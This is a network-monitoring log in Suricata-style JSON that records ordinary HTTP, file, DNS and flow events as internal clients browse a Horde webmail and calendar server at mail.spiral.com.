{"timestamp":"2020-02-29T00:19:47.935410+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117}} {"timestamp":"2020-02-29T00:19:47.936027+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/effects.js","state":"CLOSED","stored":false,"size":38450,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.936336+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337}} {"timestamp":"2020-02-29T00:19:47.936171+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/date.js","state":"CLOSED","stored":false,"size":85570,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.936959+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:19:47.937801+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974}} {"timestamp":"2020-02-29T00:19:47.937896+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569}} {"timestamp":"2020-02-29T00:19:47.938574+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569},"app_proto":"http","fileinfo":{"filename":"\/turba\/js\/minisearch.js","state":"CLOSED","stored":false,"size":1408,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.939491+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105}} {"timestamp":"2020-02-29T00:19:47.938699+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52920,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538},"app_proto":"http","fileinfo":{"filename":"\/js\/growler.js","state":"CLOSED","stored":false,"size":8911,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.939371+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/sound.js","state":"CLOSED","stored":false,"size":2456,"tx_id":5}} {"timestamp":"2020-02-29T00:19:47.940311+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tabset.png","state":"CLOSED","stored":false,"size":105,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.941636+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116}} {"timestamp":"2020-02-29T00:19:47.942466+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52920,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new-bg.png","state":"CLOSED","stored":false,"size":116,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.942679+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logo.png","state":"CLOSED","stored":false,"size":2337,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.944777+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/head-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.944907+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117},"app_proto":"http","fileinfo":{"filename":"\/js\/hordecore.js","state":"CLOSED","stored":false,"size":25017,"tx_id":5}} {"timestamp":"2020-02-29T00:19:47.985315+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436}} {"timestamp":"2020-02-29T00:19:47.985584+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674}} {"timestamp":"2020-02-29T00:19:47.985593+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558}} {"timestamp":"2020-02-29T00:19:47.985546+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221}} {"timestamp":"2020-02-29T00:19:47.985564+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423}} {"timestamp":"2020-02-29T00:19:47.985684+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546}} {"timestamp":"2020-02-29T00:19:48.131634+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings.png","state":"CLOSED","stored":false,"size":423,"tx_id":2}} {"timestamp":"2020-02-29T00:19:48.131778+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logout.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":674},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logout.png","state":"CLOSED","stored":false,"size":674,"tx_id":3}} {"timestamp":"2020-02-29T00:19:48.132056+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493}} {"timestamp":"2020-02-29T00:19:48.132118+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:19:49.677172+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7421},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":36246,"tx_id":0}} {"timestamp":"2020-02-29T00:19:49.688948+0000","flow_id":1638833592828724,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48417,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1346,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:49.800136+0000","flow_id":1638833592828724,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48417,"proto":"UDP","dns":{"type":"answer","id":1346,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:49.800136+0000","flow_id":1638833592828724,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48417,"proto":"UDP","dns":{"type":"answer","id":1346,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:49.965665+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339}} {"timestamp":"2020-02-29T00:19:50.000242+0000","flow_id":7712368340100,"event_type":"flow","src_ip":"192.168.10.122","src_port":44069,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:49.044164+0000","end":"2020-02-29T00:14:49.152103+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:50.000430+0000","flow_id":1980751639961820,"event_type":"flow","src_ip":"192.168.10.81","src_port":52774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1153,"bytes_toclient":9241,"start":"2020-02-29T00:18:43.876764+0000","end":"2020-02-29T00:18:49.567494+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:50.000900+0000","flow_id":2108866204128541,"event_type":"flow","src_ip":"192.168.10.122","src_port":51339,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:49.316701+0000","end":"2020-02-29T00:14:49.421564+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:50.230923+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:19:50.252004+0000","flow_id":559357987575908,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31396,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:50.360299+0000","flow_id":559357987575908,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54554,"proto":"UDP","dns":{"type":"answer","id":31396,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:50.360299+0000","flow_id":559357987575908,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54554,"proto":"UDP","dns":{"type":"answer","id":31396,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:50.428452+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629}} {"timestamp":"2020-02-29T00:19:50.428452+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:19:50.482275+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1644,"tx_id":2}} {"timestamp":"2020-02-29T00:19:50.490777+0000","flow_id":1012257993948441,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39263,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52820,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:50.601928+0000","flow_id":1012257993948441,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39263,"proto":"UDP","dns":{"type":"answer","id":52820,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:50.601928+0000","flow_id":1012257993948441,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39263,"proto":"UDP","dns":{"type":"answer","id":52820,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:50.628321+0000","flow_id":545992049333857,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59343,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17689,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:50.736476+0000","flow_id":545992049333857,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59343,"proto":"UDP","dns":{"type":"answer","id":17689,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:50.736476+0000","flow_id":545992049333857,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59343,"proto":"UDP","dns":{"type":"answer","id":17689,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:50.762114+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608}} {"timestamp":"2020-02-29T00:19:50.762114+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:19:50.766850+0000","flow_id":787291901945212,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34888,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} 